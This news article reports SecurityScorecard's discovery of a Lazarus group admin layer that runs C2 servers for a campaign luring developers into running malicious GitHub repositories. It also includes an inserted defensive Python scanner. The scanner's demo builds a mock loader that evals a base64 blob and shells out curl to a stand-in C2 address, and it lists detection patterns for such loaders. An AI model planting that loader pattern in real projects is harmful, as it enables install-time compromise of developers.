
Researchers Discover Lazarus Admin Layer for Command and Control Servers


An ongoing investigation into the activities of North Korea’s Lazarus group, a notorious cyber threat actor, has uncovered an administrative layer the group uses to manage its global campaign against cryptocurrency entities and software developers. The research, conducted by SecurityScorecard, shows how Lazarus uses this infrastructure to oversee compromised systems, control the delivery of malicious payloads, and manage the collection of exfiltrated data.

SecurityScorecard’s findings indicate that the Lazarus group operates a web-based administrative platform that is shared across several of its operations, including recent attempts to impersonate IT professionals. The same management layer serving multiple campaigns points to a tighter interconnection between the group’s tactics than previously documented, giving it centralized control over several facets of its cyber operations.

Enhanced Operational Security

Despite the elaborate operational security measures Lazarus adopted to obscure its activities, SecurityScorecard asserts a strong connection between these operations and the North Korean state. Its analysis indicated that Lazarus was executing a coordinated attack on the cryptocurrency sector worldwide.

“The evidence shows that Lazarus has been conducting a worldwide campaign aimed at the cryptocurrency market and associated developers,” noted SecurityScorecard in a recent report. “This initiative led to numerous victims inadvertently executing the malicious payloads while data was silently extracted back to North Korea.”

SecurityScorecard tracks this infrastructure as “Phantom Circuit” and uncovered it while investigating an earlier operation it calls “Operation 99.” In that campaign, the group approached software developers under the guise of recruiting for fictitious projects, luring them into carrying out deceptive project tests and code reviews.

Victims who take the bait are directed to clone a seemingly innocuous open-source repository hosted on GitHub. When the cloned project is run as part of the supposed test or review, its code reaches out to the Lazarus group’s command-and-control (C2) infrastructure, which delivers malware aimed at data theft. The group has also been embedding obfuscated backdoors in legitimate applications, including widely used authentication and cryptocurrency software, to infiltrate developers’ environments. SecurityScorecard estimates that more than 230 victims have unwittingly installed these malicious payloads as a result of this campaign.
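The lure described above only works if the developer executes the cloned project without looking at what runs automatically. The script below is an added example, not code from the article or from SecurityScorecard, of the pre-execution triage a developer or security team could run on a freshly cloned repository before installing or testing it. It flags the indicator classes this kind of lure tends to rely on: package-manager lifecycle hooks that execute on `npm install`, `eval` of decoded or obfuscated data, hard-coded raw-IP endpoints, long base64 blobs, and process-spawning calls. The heuristics, file names, and the constructed demo repository (including the `198.51.100.23` address, which is from the TEST-NET-2 documentation range) are assumptions made for illustration, not indicators taken from the Operation 99 research.

```python
"""Pre-execution triage of a cloned repository (added example, not from the article).

Assumed indicators: install-time lifecycle hooks, eval of decoded strings,
dynamic Function construction, raw-IP URLs, long base64 blobs and
process-spawning calls. None of these proves malice on its own; together they
justify reading the code before running it.
"""
import json
import re
import tempfile
from pathlib import Path

# npm hooks that run automatically during `npm install` (assumed set).
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Heuristic patterns for common loader constructs (assumed, not from the report).
PATTERNS = {
    "eval_of_decoded_data": re.compile(
        r"\beval\s*\(\s*(?:atob|Buffer\.from|base64\.b64decode|unescape)", re.I),
    "dynamic_function": re.compile(r"new\s+Function\s*\(", re.I),
    "raw_ip_url": re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?"),
    # Module imported anywhere in the file and a spawn/exec call anywhere after it.
    "child_process_exec": re.compile(
        r"(?:child_process|subprocess)\W.*\b(?:exec|spawn|Popen)\b", re.S),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}

SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".json", ".sh"}


def scan_text(relpath, text):
    """Return (path, indicator, detail) tuples for one file's contents."""
    findings = []
    if Path(relpath).name == "package.json":
        try:
            scripts = json.loads(text).get("scripts", {})
        except json.JSONDecodeError:
            scripts = {}
        for hook in sorted(LIFECYCLE_HOOKS & set(scripts)):
            findings.append((relpath, f"lifecycle_hook:{hook}", scripts[hook][:80]))
    for name, rx in PATTERNS.items():
        for m in rx.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            findings.append((relpath, name, f"line {line}"))
    return findings


def scan_repo(root):
    """Walk a checkout (skipping .git) and collect indicators from source files."""
    root = Path(root)
    findings = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix in SOURCE_SUFFIXES and ".git" not in p.parts:
            try:
                text = p.read_text(errors="replace")
            except OSError:
                continue
            findings.extend(scan_text(str(p.relative_to(root)), text))
    return findings


def build_demo_repo(root):
    """Write a constructed repository that mimics the lure: a harmless-looking
    project whose install hook runs a loader. All contents are invented."""
    root = Path(root)
    (root / "lib").mkdir(parents=True, exist_ok=True)
    (root / "package.json").write_text(json.dumps({
        "name": "interview-task",
        "scripts": {"test": "node test.js", "postinstall": "node lib/loader.js"},
    }))
    (root / "test.js").write_text("console.log('all tests passed');\n")
    blob = "Q" * 220  # stands in for an obfuscated second stage
    (root / "lib" / "loader.js").write_text(
        "const cp = require('child_process');\n"
        "const c2 = 'http://198.51.100.23:8080/update';  // TEST-NET-2 documentation range\n"
        f"const stage2 = '{blob}';\n"
        "eval(Buffer.from(stage2, 'base64').toString());\n"
        "cp.exec('curl -s ' + c2);\n"
    )


def demo():
    """Build the constructed repo in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_repo(tmp)
        return scan_repo(tmp)


if __name__ == "__main__":
    for path, kind, detail in demo():
        print(f"{path}: {kind} ({detail})")
```

Run it against a real checkout with `scan_repo("path/to/clone")` before `npm install` or `npm test`. A `postinstall` hook pointing at a file that decodes and evaluates a blob and then shells out to a raw-IP URL is the pattern to stop on; the harmless `test.js` produces no findings, which is the point of keeping the heuristics narrow.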

Twofold Objectives

The motivations behind Lazarus’s operations appear to be twofold: facilitating cryptocurrency theft and breaching corporate networks. According to Ryan Sherstobitoff, senior vice president of threat intelligence at SecurityScorecard, developers who are fooled into executing the cloned code often do so on their corporate devices, inadvertently exposing sensitive development information.

The Phantom Circuit admin layer came to light during an effort to work out how Lazarus was managing the data stolen in Operation 99. SecurityScorecard reported that the group reached the C2 infrastructure through a layered chain of Astrill VPN connections and proxies, an indication of deliberate effort to hide its origin. Astrill is a commercial VPN service marketed for anonymous web browsing and for bypassing heavy internet censorship.

Researchers tracked Lazarus operators using Astrill VPNs that then connected through a proxy network set up under a freight company registered in Hasan, Russia, producing a convoluted trail intended to hide their true origin. The C2 servers were hosted on infrastructure linked to an entity named “Stark Industries, LLC,” which the report describes as seemingly fictitious.

SecurityScorecard concluded that the IP addresses seen connecting to the C2 servers were likely proxies intended to conceal the true starting point of the operations. “The group established a secondary connection after their initial VPN link, thus veiling their true location,” the report stated. Working back through the chain, the investigation identified six distinct IP addresses in Pyongyang that initiated the VPN connections to the C2 network associated with Operation 99.

“Phantom Circuit is the underlying operational network that connects back to Pyongyang,” added Sherstobitoff. He further emphasized that this network was also used in another campaign where the Lazarus group impersonated IT professionals to infiltrate targeted organizations effectively.

Source
www.darkreading.com
